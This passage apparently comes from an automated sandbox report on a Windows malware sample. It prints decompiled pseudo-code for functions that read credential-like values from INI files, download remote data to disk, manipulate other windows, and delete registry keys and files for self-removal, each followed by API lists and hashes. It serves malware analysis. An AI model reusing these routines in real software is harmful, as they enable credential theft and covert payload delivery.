    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E0040F9F0(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E0040F9F0(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E0040D915(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E0040FB80(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}

    APIs
    • GetAncestor.USER32(?,00000002), ref: 0040FC88
    • SendMessageTimeoutW.USER32 ref: 0040FCB3
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040FCF5
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040FD8B
    • PostMessageW.USER32(?,00000112,?,?), ref: 0040FDDE
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040FE1D
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: 223432a51a3515d8e8a63b8f871a186d4ff3ee4116a2865315f5bff99d96101e
    • Instruction ID: f4df5864e722bfe2dca3335a46ca8ba8b9232c2560144d61bffc566e945fae44
    • Opcode Fuzzy Hash: 223432a51a3515d8e8a63b8f871a186d4ff3ee4116a2865315f5bff99d96101e
    • Instruction Fuzzy Hash: 2651AF30600309AAEF305E58CC89BBE3615EF05754F240433F942F6AE2C27CC989E69A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E004186E4(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				short _v528;
    				char _v568;
    				short _v584;
    				char _v596;
    				short _v600;
    				char _v608;
    				short _v612;
    				char _v616;
    				short _v620;
    				char _v624;
    				short _v628;
    				short* _v632;
    				WCHAR* _v636;
    				WCHAR* _v640;
    				WCHAR* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t54;
    				WCHAR* _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				void* _t69;
    				WCHAR* _t72;
    				WCHAR* _t74;
    				long _t78;
    				int _t81;
    				long _t85;
    				long _t88;
    				WCHAR* _t89;
    				void* _t90;
    				WCHAR* _t94;
    				WCHAR* _t95;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t117;
    				intOrPtr _t126;
    				signed int _t127;
    				void* _t129;
    
    				_t129 = (_t127 & 0xfffffff8) - 0x284;
    				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L21:
    					return 1;
    				}
    				_t132 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t117 = E00406E55(0x1fffe);
    					_v628 = _t117;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						goto L21;
    					}
    					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
    					__eflags = _t54;
    					if(_t54 <= 0) {
    						L20:
    						E00406E85(_t117);
    						goto L21;
    					}
    					_t9 =  &(_t54[0]); // 0x1
    					_t57 = E00407D35(_t117, _t9);
    					__eflags = _t57;
    					if(_t57 == 0) {
    						goto L20;
    					}
    					_t111 = E00406E55(0xc1c);
    					_v640 = _t111;
    					__eflags = _t111;
    					if(_t111 != 0) {
    						_t11 =  &(_t111[0x2fd]); // 0x5fa
    						_v632 = _t11;
    						_v644 = _t117;
    						_t61 = 0x72;
    						E00405B00(_t61,  &_v584);
    						_t63 = 0x73;
    						E00405B00(_t63,  &_v596);
    						_t65 = 0x74;
    						E00405B00(_t65,  &_v608);
    						_t67 = 0x75;
    						E00405B00(_t67,  &_v624);
    						_t69 = 0x76;
    						E00405B00(_t69,  &_v616);
    						goto L9;
    						L18:
    						_t74 = E00407D71(_v648, 1);
    						_v652 = _t74;
    						__eflags = _t74;
    						if(_t74 != 0) {
    							_t111 = _v644;
    							L9:
    							_t72 = StrStrIW(_v644,  &_v584);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
    								__eflags = _t78;
    								if(_t78 != 0) {
    									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
    									_v640 = _t81;
    									__eflags = _t81 - 1 - 0xfffe;
    									if(_t81 - 1 <= 0xfffe) {
    										_t112 =  &(_t111[0xff]);
    										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
    										__eflags = _t85;
    										if(_t85 != 0) {
    											_t33 =  &(_t112[0xff]); // 0x0
    											_t124 = _t33;
    											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
    											__eflags = _t88;
    											if(_t88 != 0) {
    												_t89 = E004079D4(_t124);
    												__eflags = _t89;
    												if(_t89 > 0) {
    													_t125 =  &_v568;
    													_t90 = 0x55;
    													E00405B00(_t90,  &_v568);
    													_push(_v640);
    													_t38 =  &(_t112[0xff]); // 0x0
    													_push(_v644);
    													_push(_t112);
    													_t113 = _v636;
    													_t94 = E00407B78(_t125, 0x311, _v636, _t125);
    													_t129 = _t129 + 0x14;
    													__eflags = _t94;
    													if(_t94 > 0) {
    														_t126 = _a4;
    														_t95 = E00407279(_t94, _t126, _t113);
    														__eflags = _t95;
    														if(_t95 != 0) {
    															_t42 = _t126 + 4;
    															 *_t42 =  &(( *(_t126 + 4))[0]);
    															__eflags =  *_t42;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L18;
    						}
    						E00406E85(_v644);
    						_t117 = _v636;
    					}
    					goto L20;
    				} else {
    					E004186AC(_t132,  &_v524, _a4);
    					goto L21;
    				}
    			}

    APIs
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • GetPrivateProfileStringW.KERNEL32 ref: 00418759
    • StrStrIW.SHLWAPI(?,?), ref: 004187E6
    • GetPrivateProfileStringW.KERNEL32 ref: 0041880E
    • GetPrivateProfileIntW.KERNEL32 ref: 0041882B
    • GetPrivateProfileStringW.KERNEL32 ref: 0041885C
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: d17e0efc3d2463432757784f7b225a6ce6cf0974181a0f56db8cb5c044e453a8
    • Instruction ID: 62aeb255c685669e1bc60132f8fd86926532cf79eb21e9a57f2d68ac66b44a0a
    • Opcode Fuzzy Hash: d17e0efc3d2463432757784f7b225a6ce6cf0974181a0f56db8cb5c044e453a8
    • Instruction Fuzzy Hash: A351A732504306ABD710EB65CC45FEBB7E8EF84704F40092EB998E7191DB38E945C79A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C621(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
    				char _v5;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				void* __edi;
    				void* __esi;
    				signed int _t55;
    				void* _t58;
    				struct _GOPHER_FIND_DATAA _t59;
    				intOrPtr _t60;
    				struct _GOPHER_FIND_DATAA _t61;
    				struct _GOPHER_FIND_DATAA _t62;
    				signed int _t71;
    				struct _GOPHER_FIND_DATAA _t79;
    				struct _GOPHER_FIND_DATAA _t84;
    				int _t89;
    				struct _GOPHER_FIND_DATAA _t91;
    				void* _t96;
    				intOrPtr* _t99;
    				struct _GOPHER_FIND_DATAA _t103;
    				struct _GOPHER_FIND_DATAA _t107;
    
    				_v16 = _v16 | 0xffffffff;
    				EnterCriticalSection(0x424004);
    				_t99 = _a4;
    				_t55 = E0041BE86( *_t99);
    				if(_t55 == 0xffffffff) {
    					L33:
    					LeaveCriticalSection(0x424004);
    					return _v16;
    				}
    				_t58 = _t55 * 0x24 +  *0x42401c;
    				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
    					goto L33;
    				}
    				_t96 = _t58;
    				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
    					_t59 = _a16;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *_t59 =  *_t59 & 0x00000000;
    						__eflags =  *_t59;
    					}
    					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
    					if(__eflags != 0) {
    						L22:
    						_t60 =  *((intOrPtr*)(_t96 + 0x18));
    						__eflags = _t60 - 0xffffffff;
    						if(_t60 != 0xffffffff) {
    							__eflags = _v16 - 0xffffffff;
    							if(_v16 == 0xffffffff) {
    								_t61 = _t60 -  *(_t96 + 0x1c);
    								__eflags = _t61;
    								_t103 = _t61;
    								if(_t61 != 0) {
    									__eflags = _a8;
    									if(_a8 == 0) {
    										_a12 = E0040820A(0x2000, 0x1000);
    									}
    									__eflags = _a12 - _t103;
    									_t103 =  <  ? _a12 : _t103;
    									__eflags = _a8;
    									if(_a8 != 0) {
    										E00406EC1(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
    										_t50 = _t96 + 0x1c;
    										 *_t50 =  *(_t96 + 0x1c) + _t103;
    										__eflags =  *_t50;
    									}
    								}
    								_t62 = _a16;
    								__eflags = _t62;
    								if(_t62 != 0) {
    									 *_t62 = _t103;
    								}
    								_v16 = 1;
    							}
    						}
    						goto L32;
    					}
    					LeaveCriticalSection(0x424004);
    					_v5 = E0041C508( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
    					EnterCriticalSection(0x424004);
    					__eflags = _v5;
    					if(_v5 == 0) {
    						L21:
    						_t37 =  &_v16;
    						 *_t37 = _v16 & 0x00000000;
    						__eflags =  *_t37;
    						SetLastError(0x2ee4);
    						goto L22;
    					}
    					_t105 =  *_a4;
    					_t71 = E0041BE86( *_a4);
    					__eflags = _t71 - 0xffffffff;
    					if(_t71 == 0xffffffff) {
    						E00406E85(_v12);
    						goto L21;
    					}
    					_t96 = _t71 * 0x24 +  *0x42401c;
    					_t101 = E00408FBB( &_v24, _t105);
    					_t79 = E0041B69B( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L19:
    						E00406E85(_t101);
    						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
    						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
    						goto L22;
    					}
    					_t84 = E004070C5(_v24, 0, _t101);
    					_a4 = _t84;
    					__eflags = _t84;
    					if(_t84 == 0) {
    						goto L19;
    					}
    					_v28 = 0x1000;
    					_t107 = E00406E55(0x1000);
    					__eflags = _t107;
    					if(_t107 == 0) {
    						L18:
    						E00406E85(_a4);
    						goto L19;
    					}
    					 *_t107 = 0x50;
    					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
    					__eflags = _t89;
    					if(_t89 != 0) {
    						_t91 =  *(_t107 + 8);
    						__eflags = _t91;
    						if(_t91 != 0) {
    							__eflags =  *_t91;
    							if( *_t91 != 0) {
    								E0040C035(_t91, _v12, _v20);
    							}
    						}
    					}
    					E00406E85(_t107);
    					goto L18;
    				} else {
    					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
    					L32:
    					goto L33;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00424004), ref: 0041C632
    • LeaveCriticalSection.KERNEL32(00424004), ref: 0041C695
    • EnterCriticalSection.KERNEL32(00424004), ref: 0041C6B2
    • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041C736
    • SetLastError.KERNEL32(00002EE4), ref: 0041C78C
    • LeaveCriticalSection.KERNEL32(00424004), ref: 0041C7F5
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
    • String ID:
    • API String ID: 3653105453-0
    • Opcode ID: 11415392dda88cff2d4655ebc6dcec223bdd1e5af30901cbcecc69e2af5d56c5
    • Instruction ID: 0589474c1f5af7b14ed4e4a073bde7b2d98ec1f16d85406bdf3d2da42e77361a
    • Opcode Fuzzy Hash: 11415392dda88cff2d4655ebc6dcec223bdd1e5af30901cbcecc69e2af5d56c5
    • Instruction Fuzzy Hash: BF517A35940206AFCB109F65CCC4BDE7BA4AF04364F04416AF925AB2E1D7B8D991CFA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E004182ED(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				short* _v16;
    				WCHAR* _v20;
    				short _v32;
    				short _v48;
    				short _v68;
    				short _v88;
    				short _v112;
    				char _v144;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t40;
    				long _t41;
    				void* _t48;
    				void* _t50;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t61;
    				WCHAR* _t64;
    				void* _t72;
    				void* _t76;
    				WCHAR* _t83;
    				WCHAR* _t84;
    				WCHAR* _t86;
    				intOrPtr _t96;
    				void* _t97;
    
    				_t81 = __edx;
    				_t40 = E00406E55(0x1fffe);
    				_t86 = _t40;
    				_v20 = _t86;
    				if(_t86 == 0) {
    					return _t40;
    				}
    				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
    				if(_t41 <= 0) {
    					L17:
    					return E00406E85(_t86);
    				}
    				_t3 = _t41 + 1; // 0x1
    				if(E00407D35(_t86, _t3) == 0) {
    					goto L17;
    				}
    				_t83 = E00406E55(0xc08);
    				_v12 = _t83;
    				if(_t83 == 0) {
    					goto L17;
    				} else {
    					_t5 =  &(_t83[0x2fd]); // 0x5fa
    					_v16 = _t5;
    					_v8 = _t86;
    					_t48 = 0x65;
    					E00405B00(_t48,  &_v112);
    					_t50 = 0x66;
    					E00405B00(_t50,  &_v48);
    					_t52 = 0x67;
    					E00405B00(_t52,  &_v32);
    					_t54 = 0x68;
    					E00405B00(_t54,  &_v88);
    					_t56 = 0x69;
    					E00405B00(_t56,  &_v68);
    					goto L6;
    					L15:
    					_t61 = E00407D71(_v8, 1);
    					_v8 = _t61;
    					if(_t61 != 0) {
    						_t83 = _v12;
    						L6:
    						if(StrStrIW(_v8,  &_v112) == 0) {
    							_t64 = StrStrIW(_v8,  &_v48);
    							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
    								_t84 =  &(_t83[0xff]);
    								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
    									_t26 =  &(_t84[0xff]); // 0x0
    									_t94 = _t26;
    									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E00418182(_t81, _t94) > 0) {
    										_t95 =  &_v144;
    										_t72 = 0x56;
    										E00405B00(_t72,  &_v144);
    										_push(_v12);
    										_t30 =  &(_t84[0xff]); // 0x0
    										_push(_t84);
    										_t85 = _v16;
    										_t81 = 0x307;
    										_t76 = E00407B78(_t95, 0x307, _v16, _t95);
    										_t97 = _t97 + 0x10;
    										if(_t76 > 0) {
    											_t96 = _a8;
    											if(E00407279(_t76, _t96, _t85) != 0) {
    												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L15;
    					} else {
    						E00406E85(_v12);
    						_t86 = _v20;
    						goto L17;
    					}
    				}
    			}

    APIs
    • GetPrivateProfileStringW.KERNEL32 ref: 00418324
      • Part of subcall function 00406E55: HeapAlloc.KERNEL32(00000008,-00000004,00408623,00000000,?,?,?,004127CC,00000000,00412CA6,?,?,00000000), ref: 00406E66
    • StrStrIW.SHLWAPI(00000001,?), ref: 004183AC
    • StrStrIW.SHLWAPI(00000001,?), ref: 004183BD
    • GetPrivateProfileStringW.KERNEL32 ref: 004183D9
    • GetPrivateProfileStringW.KERNEL32 ref: 004183F7
    • GetPrivateProfileStringW.KERNEL32 ref: 00418411
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$AllocHeap
    • String ID:
    • API String ID: 2479592106-0
    • Opcode ID: 63a991a1d009bc6c761cfb6eae8322efa6e3351913f8c7256ac19bcf3f5a83de
    • Instruction ID: b2cb8b91b6e7ae30bddef1c211a46eacf71aa0220d616f6ed6c87ea66213bbff
    • Opcode Fuzzy Hash: 63a991a1d009bc6c761cfb6eae8322efa6e3351913f8c7256ac19bcf3f5a83de
    • Instruction Fuzzy Hash: E7414332D0021ABADF10ABA5CC41EEFB779EF44754F14402AB904B7291DF39AE55CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004164CE(void* __ebx, void* __ecx, void* __eflags) {
    				char _v1168;
    				char _v1668;
    				char _v1680;
    				short _v1688;
    				char _v2192;
    				short _v2208;
    				char _v2720;
    				char _v2728;
    				char _v2992;
    				char _v3072;
    				void* __edi;
    				void* __esi;
    				void* _t34;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t52;
    				void* _t65;
    
    				_t65 = __eflags;
    				_t46 = __ecx;
    				_t50 =  &_v1668;
    				E004131E9(__ecx, _t50, 1);
    				PathRemoveFileSpecW(_t50);
    				_t51 =  &_v2192;
    				E004131E9(_t46, _t51, 2);
    				PathRemoveFileSpecW(_t51);
    				 *0x423968 =  *0x423968 | 0x00000002;
    				_push(0);
    				E00415A14();
    				E004157F3(_t46, _t65);
    				E0040C4F3( &_v1680, _t65);
    				E0040C4F3(_t51, _t65);
    				_t52 =  &_v2720;
    				E004131E9(_t51, _t52, 3);
    				SHDeleteKeyW(0x80000001, _t52);
    				CharToOemW( &_v1688,  &_v2728);
    				CharToOemW( &_v2208,  &_v2992);
    				_t53 =  &_v3072;
    				_t34 = 7;
    				E00405ACA(_t34,  &_v3072);
    				_push( &_v2992);
    				_push( &_v2728);
    				_push( &_v2992);
    				_push( &_v2728);
    				if(E00407BBC( &_v3072, 0x474,  &_v1168, _t53) > 0) {
    					E00408945(__ebx, 0x474,  &_v1168);
    				}
    				if( *0x423e30 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}

    APIs
      • Part of subcall function 004131E9: PathRenameExtensionW.SHLWAPI(?,.dat,?,004239C8,00000000,00000032,?,77E49EB0,00000000), ref: 00413262
    • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 004164F3
    • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00416506
      • Part of subcall function 00415A14: SetEvent.KERNEL32(00416516,00000000), ref: 00415A1A
      • Part of subcall function 00415A14: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00415A2D
      • Part of subcall function 004157F3: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 00415830
      • Part of subcall function 004157F3: Sleep.KERNEL32(000001F4), ref: 0041583F
      • Part of subcall function 004157F3: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00415855
      • Part of subcall function 0040C4F3: FindFirstFileW.KERNEL32(?,?,?), ref: 0040C524
      • Part of subcall function 0040C4F3: FindNextFileW.KERNEL32(00000000,?), ref: 0040C57F
      • Part of subcall function 0040C4F3: FindClose.KERNEL32(00000000), ref: 0040C58A
      • Part of subcall function 0040C4F3: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040C596
      • Part of subcall function 0040C4F3: RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040C59D
    • SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00416544
    • CharToOemW.USER32 ref: 00416560
    • CharToOemW.USER32 ref: 0041656F
    • ExitProcess.KERNEL32 ref: 004165C5
      • Part of subcall function 00408945: CharToOemW.USER32 ref: 00408975
      • Part of subcall function 00408945: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 004089F9
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
    • String ID:
    • API String ID: 1572960351-0
    • Opcode ID: bb249a434cee88e5a10a7a2ca2d4e1c874a2732d5624156f8528c0c962c0acae
    • Instruction ID: 44527f5a0f526cb38b148757ac9eb27a8bdc7527acb5191ebe7d9583583308b9
    • Opcode Fuzzy Hash: bb249a434cee88e5a10a7a2ca2d4e1c874a2732d5624156f8528c0c962c0acae
    • Instruction Fuzzy Hash: 1621DB72608344ABC230EBA5DC46FDB77EDEBC4315F00052BB548E7191DB79A605CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408CC7(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E00406E55(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E0040C1E0(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E00406E85(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00408CE7
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408D15
    • InternetReadFile.WININET(00001000,?,00001000,?), ref: 00408D31
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00408D4C
    • FlushFileBuffers.KERNEL32(00000000), ref: 00408D6C
    • CloseHandle.KERNEL32(00000000), ref: 00408D7F
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: bdb3deb61500ce559e6487ec8c9222708f49d8a4f7dc51fcd394e5bafa4a40d0
    • Instruction ID: d9fe38959f2dd121f5a8e5f81586a47dc4f922a8085ebbef021080fa2b8a635c
    • Opcode Fuzzy Hash: bdb3deb61500ce559e6487ec8c9222708f49d8a4f7dc51fcd394e5bafa4a40d0
    • Instruction Fuzzy Hash: 8F217A31900249BFDF119FA0DE84FAE7B79AF15340F00867AF591B11E0EB798D549B29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0040B5BA(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E0040B5BA(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}

    APIs
